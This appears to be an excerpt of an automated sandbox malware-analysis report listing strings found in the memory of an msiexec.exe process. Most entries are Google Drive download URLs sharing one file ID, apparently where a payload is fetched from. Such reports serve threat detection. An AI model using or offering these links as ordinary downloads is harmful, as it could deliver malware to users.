Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
Source: msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadearch
Source: msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadglev
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadider
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadn.net
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadnt-cn#
Source: msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q)
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10qI
Source: msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10qIBW7Tm3axNeL10q
Source: msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10qIBW7Tm3axNeL10qA
Source: msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055912606.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10qQ
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000619A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10ql
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10qst
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10qx
Source: msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/2
Source: msiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/b
Source: msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/be
Source: msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download
Source: msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download0H
Source: msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download1S
Source: msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download4M
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadG
Source: msiexec.exe, 00000005.00000003.2557342511.00000000061DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadV
Source: msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055895124.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027572606.0000000006259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadbU
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971037360.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadcu
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1970858876.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971037360.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027596508.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadea
Source: msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=downloadgl
